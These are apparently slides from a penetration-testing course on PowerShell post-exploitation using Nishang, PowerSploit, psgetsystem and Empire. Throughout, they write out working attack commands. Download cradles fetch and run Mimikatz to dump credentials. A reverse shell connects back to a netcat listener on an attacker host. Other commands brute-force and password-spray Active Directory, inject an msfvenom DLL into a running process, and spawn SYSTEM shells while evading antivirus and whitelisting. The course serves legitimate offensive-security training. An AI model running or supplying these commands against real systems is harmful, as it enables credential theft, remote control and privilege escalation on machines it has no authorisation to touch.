The Invoke-Mimikatz cmdlet will dump clear-text credentials (or hashes) from memory. Note,
that we can also pass command line parameters to any of the modules that have additional
options as part of our download cradle commands:
iex (New-Object Net.WebClient).DownloadString('http://attacker/Invoke-Mimikatz’); Invoke-
Mimikatz -DumpCreds

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

There are plenty of other very useful Nishang “gather” modules
which will come in handy for our post-exploitation purposes,
explore!

https://github.com/samratashok/nishang#gather

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

As part of its catalog, Nishang includes a great brute force tool “Invoke-BruteForce.” We can use this
to brute force Active Directory accounts, SQL Server, Web or FTP servers. The great thing about a
brute force tool written in PowerShell is that we can execute the attack from our target host as long
as we copy a file containing usernames and passwords to our target.
PS C:\> Invoke-BruteForce –ComputerName targetdomain.com –UserList C:\temp\users.txt
–PasswordList C:\temp\pwds.txt –Service ActiveDirectory –StopOnSuccess -Verbose

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Invoke-BruteForce is also a great tool for executing a password
spray attack against Active Directory.

Just ensure that your password list contains a single password.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

The “Invoke-PowerShellTcp” cmdlet within the Nishang framework
provides an excellent way to obtain a reverse PowerShell shell
from our target host back to a netcat listener.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Keep in mind that if using this method, take into consideration that
the traffic is traversing the wire in cleartext between attacker and
target.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Although a great and undetected (by Antivirus) method to get a
reverse shell from PowerShell, over-the-wire heuristics (SIEM) may
pick up some of the back and forth chatter if that type of solution
has been implemented within an organization.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

To use this, we should first fire up a netcat listener on our attacker
machine.

We’ll configure it on port 4444 for this example.

# nc -nlvp 4444

Next, we can simply invoke it using a download cradle from the
target system, this time, from a windows command prompt on the
target.
C:\> powershell.exe –Command iex (New-Object
Net.WebClient).DownloadString(‘http://<attacker_URL>/Invoke-PowerShellTcp.ps1’);
Invoke-PowerShellTcp -Reverse -IPAddress <listener_IP> -Port 4444

And on our listener, we should receive a connect back from the
target, into a PowerShell prompt:

There are several different shells, both bind, reverse, ICMP, UDP shells, and some more
complex “rat”-type shells we can utilize from Nishang. Experiment with the different
types:

Invoke-JSRatRegsvr.ps1: https://github.com/samratashok/nishang/blob/master/Shells/Invoke-JSRatRegsvr.ps1
Invoke-JSRatRundll.ps1: https://github.com/samratashok/nishang/blob/master/Shells/Invoke-JSRatRundll.ps1
Invoke-PoshRatHttp.ps1: https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PoshRatHttp.ps1
Invoke-PoshRatHttps.ps1: https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PoshRatHttps.ps1
Invoke-PowerShellIcmp.ps1: https://github.com/samratashok/nishang/blob/master/Shells/Invoke-
PowerShellIcmp.ps1
Invoke-PowerShellTcp.ps1: https://github.com/samratashok/nishang/blob/master/Shells/Invoke-
PowerShellTcp.ps1
Invoke-PowerShellTcpOneLine.ps1: https://github.com/samratashok/nishang/blob/master/Shells/Invoke-
PowerShellTcpOneLine.ps1

Different types continued:

Invoke-PowerShellTcpOneLineBind.ps1:
https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLineBind.ps1
Invoke-PowerShellUdp.ps1: https://github.com/samratashok/nishang/blob/master/Shells/Invoke-
PowerShellUdp.ps1
Invoke-PowerShellUdpOneLine.ps1: https://github.com/samratashok/nishang/blob/master/Shells/Invoke-
PowerShellUdpOneLine.ps1
Invoke-PowerShellWmi.ps1: https://github.com/samratashok/nishang/blob/master/Shells/Invoke-
PowerShellWmi.ps1
Invoke-PsGcat.ps1: https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PsGcat.ps1
Invoke-PsGcatAgent.ps1: https://github.com/samratashok/nishang/blob/master/Shells/Invoke-
PsGcatAgent.ps1
Remove-PoshRat.ps1: https://github.com/samratashok/nishang/blob/master/Shells/Remove-PoshRat.ps1

In addition to the “Gather” and other modules we’ve covered, we can find a script for
mostly any phase of our post-exploitation within the Nishang Framework with utilities in
the following categories.

ActiveDirectory: https://github.com/samratashok/nishang/tree/master/ActiveDirectory
Antak-WebShell: https://github.com/samratashok/nishang/tree/master/Antak-WebShell
Backdoors: https://github.com/samratashok/nishang/tree/master/Backdoors
Bypass: https://github.com/samratashok/nishang/tree/master/Bypass
Client: https://github.com/samratashok/nishang/tree/master/Client
Escalation: https://github.com/samratashok/nishang/tree/master/Escalation
Execution: https://github.com/samratashok/nishang/tree/master/Execution
Gather: https://github.com/samratashok/nishang/tree/master/Gather

MITM: https://github.com/samratashok/nishang/tree/master/MITM
Misc: https://github.com/samratashok/nishang/tree/master/Misc
Pivot: https://github.com/samratashok/nishang/tree/master/Pivot
Prasadhak: https://github.com/samratashok/nishang/tree/master/Prasadhak
Scan: https://github.com/samratashok/nishang/tree/master/Scan
Shells: https://github.com/samratashok/nishang/tree/master/Shells
Utility: https://github.com/samratashok/nishang/tree/master/Utility

Explore all of the different options we have with this framework and how it
relates to our post-exploitation process.

Seeing as we’ve previously covered several tools within the
PowerSploit framework for the purpose of information gathering
(the Invoke-PortScan and Get-HttpStatus tools specifically), we
should also cover some of the tools it provides in regards to post-
exploitation as well.

https://github.com/PowerShellMafia/PowerSploit

As with other frameworks, there are several categories in
PowerSploit we can use for our post-exploitation purposes.

• AntivirusBypass • Persistence
• Code Execution • Privesc
• Exfiltration • Recon
• Mayhem • ScriptModification

One which we should cover here, and offers a good starting point
in the identification of misconfigurations which could lead to
privilege escalation, is the “PowerUp” module within the “Privesc”
category.

https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1

We can first import the Privesc.psm1 module from within the
Privesc modules directory and have a look at some of the options
we have:
PS C:\Modules\PowerSploit\Privesc> Import-Module .\Privesc.psm1

PS C:\> Get-Command –Module Privesc

We can see the PowerUp module has plenty of options for us to
explore.

Of course, we can run any one of those functions or scripts

independently, but this module includes an “Invoke-AllChecks”
function.

Invoke-AllChecks will run all functions related to the Privesc
module looking for misconfigurations, permissions issues with
services, opportunities for DLL hijacking a number of other useful
checks.

PS C:\Modules\PowerSploit\Privesc> Invoke-AllChecks

We can invoke it
on the target after
we’ve imported
the Privesc.psm1
module with the
“Invoke-
AllChecks”
command.

The output will also
indicate an
“AbuseFuntion” we
can use to further
exploit the target.

In the case with the

following example,
PowerUp identified a
potential service
binary we can install
with the “Install-
ServiceBinary –Name
‘ClickToRunSvc’
command.

PowerUp also gives us the option to save all results to an HTML file
with the -HTMLReport flag and will generate an HTML file we can
use to investigate any paths to privilege escalation.

The file will be saved in the current directory Invoke-AllChecks was

run from and will be in “MACHINENAME.USERNAME.html” naming
format.
PS C:\> Invoke-AllChecks -HTMLReport

-HTMLReport Output

The “CodeInjection” category in PowerSploit gives us some options
in regards to several methods we can inject our own code into
existing processes on the target system, whether it be via DLL
injection, injecting our own custom Shellcode into an existing
process, or using WMI to execute commands on the target.

The one we’d like to cover is the “Invoke-DLLInjection” script as it’s
the most commonly used.

This function injects an attacker-defined DLL into any existing

process ID on the target system.

The first requirement, of course, is that we generate a DLL for
demonstration purposes.

This can be done in a number of ways, but most commonly, we can

just use Metasploit’s msfvenom to generate one with the following
command:
msfvenom -p windows/exec CMD=“cmd.exe” -f dll > cmd.dll

The example on the previous slide will simply execute a cmd.exe
prompt on the target when injected.

In your exploration of the tool, you can create a dll that will spawn
a meterpreter reverse shell for instance.

The DLL will need to be downloaded to the target. This can be
done in any number of ways we’ve covered in this module.

We can use the Net.WebClient “DownloadFile” download cradle

method for that.
PS C:\> iex (New-Object
Net.Webclient).DownloadFile(‘http://attacker_URL/cmd.dll’,
‘C:\programdata\cmd.dll’)

In the above, we’re downloading our cmd.dll file into the

“C:\Programdata\” folder on the target.

We should next identify a process on the
target system we’d like to inject our DLL
into. We can simply run the “ps” command PS C:\> ps | ? {$_.ProcessName -match “notepad"}
from the powershell console.

In this example, we’ll run the “ps”

command with a where-object statement to
look for a process that matches “notepad,”
and we’ll inject our DLL into that process
(reference figure to the right).

In this case, we’ve identified three

processes matching the “notepad” string,
and we’ll choose the one with Pid “7420”
for our DLL Injection.

Once we’ve downloaded our DLL to the target, and identified the
process we’re going to inject into, in this example, we’ve chosen
the notepad.exe process ID 7420, we can use another download
cradle (this time “DownloadString” method) to download and
execute the “Invoke-DLLInjection.ps1” script from our attacker
system, along with the correct arguments for injecting our DLL into
that existing process.
PS C:\> iex (New-Object
Net.Webclient).DownloadString(‘http://attacker_URL/Invoke-
DLLInjection.ps1); Invoke-DLLInjection –ProcessID 7420
C:\programdata\cmd.dll

Once that is complete, if we run the “ps” command again, we can
confirm that we now have a “cmd” process which has been
spawned from our DLL Injection operation, which is created in a
new process thread.

A great explanation of the basics of how DLL injection works can be
found here:
http://blog.opensecurityresearch.com/2013/01/windows-dll-
injection-basics.html

PowerShell &
Metasploit

Another excellent PowerShell tool we’d like to mention by
decoder-it is “psgetsystem” and can be downloaded here:

https://github.com/decoder-it/psgetsystem

https://github.com/decoder-it
https://github.com/decoder-it/psgetsystem
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
Psgetsystem allows us to get SYSTEM privileges via a parent
process, which then spawns a child process which effectively
inherits the SYSTEM access privileges of the parent.

Although this tool needs to be run as Administrator, it’s a great way
to evade application whitelisting solutions by being able to inject
ourselves into an already signed or other trusted process.

Let’s see it in action.

Once we’ve downloaded the psgetsys.ps1 script to our target, we

can source it and execute its class function with the following
commands:
PS C:\> . .\psgetsys.ps1
PS C:\> [MyProcess]::CreateProcessFromParent(<system_pid>,”<command_to_execute>”)

But before we do that, we need to identify some SYSTEM
processes and choose one we can “piggyback” onto.

We can use the following command to find those:

PS C:\> Get-Process -IncludeUserName | Where-Object {$_.UserName -match
"SYSTEM"} |Format-List –Property Username,Name,Id

That should return a
list of all SYSTEM-
owned processes
along with their
PIDs and process
names.

We’ll use the

“ZeroConfigService”
for our example:

Now that we have a PID for a SYSTEM-owned process (3632 in this case), we can
continue with our execution of psgetsystem.

For demonstration purposes, we’ll instruct psgetsystem to run “cmd.exe” within the
ZeroConfigService process 3632.

This will launch a cmd.exe prompt, but as a child process of the SYSTEM-owned
ZeroConfigService.exe process, and as a result, our “child” process, will also be
SYSTEM.
PS C:\> . .\psgetsys.ps1
PS C:\> [MyProcess]::CreateProcessFromParent(3632,”cmd.exe”)

We can confirm this by running a tool like Process Explorer, to see
that our cmd.exe process has been spawned as a child process of
the ZeroConfigService process, and is also SYSTEM.

In an attack scenario, we could easily launch a meterpreter
executable payload as SYSTEM, and get a SYSTEM shell from the
target machine.

Empire is another great post-exploitation framework which we’ll
briefly describe here but will cover in greater detail in a video
accompanying this module.

https://github.com/EmpireProject/Empire

Its main advantage is that it implements powershell functionality
without requiring the existence of powershell on a target machine.

It is in a world of its own in regards to other frameworks in that it

utilizes its own built-in listeners, agents and modules to
compromise and conduct all facets of post-exploitation from
information gathering to privilege escalation, lateral movement,
persistence and also integrates with the Metasploit Framework.

You can learn more about Empire here:

https://github.com/EmpireProject/Empire/wiki/Quickstart

Make sure to check out the video included with this module for a
walkthrough of its capabilities.

Introduction to
Empire Overview Leveraging WMI and
Methods for Persistence

PowerShell and
Metasploit

UAC Bypass PowerShell

Exploit Script
Walkthrough

This concludes the PowerShell for Pentesters module.

As with all other technologies we encounter throughout our experiences with

Penetration Testing and Information Security in-general, it’s important that we
allow ourselves to dig deeper in our quest to understand the multitude of
methods, techniques, and tools that we encounter throughout our journey.
Many great resources can aid us in our paths to “security enlightenment,” and
we should explore all possible paths in an attempt to understand this amazing,
creative and everchanging field better.

Explore all paths, and enjoy the process! We hope you’ve enjoyed this lesson.

PowerShell for PowerShell for
Pentesters – Part 1 Pentesters – Part 2

Penetration Testing Professional 5.0 – Caendra Inc. © 2018
Net.WebClient DownloadFile
System.Net.WebClient Method
https://msdn.microsoft.com/en- https://msdn.microsoft.com/en-
us/library/system.net.webclient(v=vs.110).aspx us/library/ez801hhe(v=vs.110).aspx

New-Object Net.WebRequest
https://docs.microsoft.com/en- https://msdn.microsoft.com/en-
us/powershell/module/microsoft.powershell.utility/ne us/library/system.net.webrequest(v=vs.110).aspx
w-object?view=powershell-6

Invoke-Expression COM Objects

https://docs.microsoft.com/en- https://msdn.microsoft.com/en-
us/powershell/module/microsoft.powershell.utility/in us/library/windows/desktop/ms690343(v=vs.85).aspx
voke-expression?view=powershell-6

Net.WebClient System.Xml.XmlDocument
DownloadString Method https://msdn.microsoft.com/en-
us/library/system.xml.xmldocument(v=vs.110).aspx
https://msdn.microsoft.com/en-
us/library/fhd1f0sw(v=vs.110).aspx

DLL Injection Basics Empire
http://blog.opensecurityresearch.com/2013/01/wind https://github.com/EmpireProject/Empire/wiki/Quick
ows-dll-injection-basics.html start

Invoke-CradleCrafter Get-HttpStatus
https://github.com/danielbohannon/Invoke- https://powersploit.readthedocs.io/en/latest/Recon/
CradleCrafter Get-HttpStatus/

Invoke-Obfuscation Posh-SecMod
https://github.com/danielbohannon/Invoke- https://github.com/darkoperator/Posh-SecMod
Obfuscation

PowerSploit Nishang
https://github.com/PowerShellMafia/PowerSploit https://github.com/samratashok/nishang

psgetsystem
Invoke-Portscan https://github.com/decoder-it/psgetsystem
https://github.com/PowerShellMafia/PowerSploit/blo
b/master/Recon/Invoke-Portscan.ps1

Empire
https://github.com/EmpireProject/Empire